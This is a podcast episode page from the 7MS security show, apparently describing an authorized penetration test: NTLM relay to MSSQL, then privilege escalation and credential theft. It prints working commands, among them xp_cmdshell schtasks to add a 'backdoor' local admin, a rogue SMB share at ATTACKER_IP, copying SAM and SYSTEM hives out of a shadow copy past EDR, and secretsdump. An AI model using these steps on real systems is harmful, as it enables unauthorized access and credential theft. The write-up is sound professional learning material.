7MS #692: Tales of Pentest Pwnage – Part 76
7 Minute Security12 Syys 2025

7MS #692: Tales of Pentest Pwnage – Part 76

Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else:

I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.

I relayed the DA account to a SQL box that BloodHound said had a "session" from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance".

Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy.

In the end, the bizarre combo of things that did the trick was:

  • Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!'
  • From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\
  • From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL!
  • Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed!
  • I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!!
  • Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

Tämä jakso on lisätty Podme-palveluun avoimen RSS-syötteen kautta eikä se ole Podmen omaa tuotantoa. Siksi jakso saattaa sisältää mainontaa.

Jaksot(741)

7MS #741: Tales of Pentest Pwnage - Part 91

7MS #741: Tales of Pentest Pwnage - Part 91

Hey friends! Today's tale of pentest pwnage is brought to you by four hours of sleep, a large mint hot cocoa, and unhealthy levels of giggity. There's a very good reason for all three, but you'll have...

25 Syys 36min

7MS #740: Tales of Pentest Pwnage - Part 90

7MS #740: Tales of Pentest Pwnage - Part 90

Hey friends! We've been on a bit of a Tales of Pentest Pwnage bender lately, so let's keep it rolling with Part 90. (And Mom, relax — this is not one pentest story chopped into 90 parts.) Today is les...

18 Syys 33min

7MS #739: Tales of Pentest Pwnage – Part 89

7MS #739: Tales of Pentest Pwnage – Part 89

Hey friends! Today is a tale of pentest pwnage episode, and this one features a path to escalation I have never seen before – one I could only find few references on the entire Internet. It happened c...

11 Syys 17min

7MS #738: Baby's First ProjectDiscovery Neo

7MS #738: Baby's First ProjectDiscovery Neo

Hey friends! Today I'm talking about Baby's First Neo — and to be crystal clear, I don't mean Keanu, and I don't mean the R&B guy with the hat. I mean the AI-powered pentest assistant from our pals at...

4 Syys 29min

7MS #737: Tales of Pentest Pwnage – Part 88

7MS #737: Tales of Pentest Pwnage – Part 88

Hello friends! Today's tale of pentest pwnage isn't a start-to-finish march to DA – it's me finally emptying out the backlog of "gosh, I've got to share this next time" internal network tips that have...

28 Elo 33min

7MS #736: Securing Your Family During and After a Disaster – Part 9

7MS #736: Securing Your Family During and After a Disaster – Part 9

Hey friends! Today's another slice of our Securing Your Family During and After a Disaster miniseries, and fair warning — it's a bit of a Friday mood-ruiner. It's been almost two months since my dad p...

21 Elo 29min

7MS #735: Baby's First Cloudflare Tunnel

7MS #735: Baby's First Cloudflare Tunnel

Hey friends! Today's episode has a new-to-me toy up front and some podcast housekeeping on the back half – all recorded with a raging case of the anxious parent giggidies, because my son Atticus had a...

14 Elo 24min

7MS #734: Insight Recon

7MS #734: Insight Recon

Hey friends! Today's episode is a two-parter: some security stuff up front, and then a big ol' personal celebration on the back half. If you're strictly here for the security bits, I love you and you'...

7 Elo 32min

Suosittua kategoriassa Politiikka ja uutiset

uutiscast
vallattomat
aikalisa
politiikan-puskaradio
rss-viihde-media
ootsa-kuullut-tasta-2
rss-ootsa-kuullut-tasta
rss-vaalirankkurit-podcast
otetaan-yhdet
rss-voi-venaja
tervo-halme
et-sa-noin-voi-sanoo-esittaa
rss-podme-livebox
rss-asiastudio
rss-ulkopoditiikkaa
the-ulkopolitist
aihe
rss-kalevi-sorsa-saation-podcast
rss-skn-parhaat
politbyroo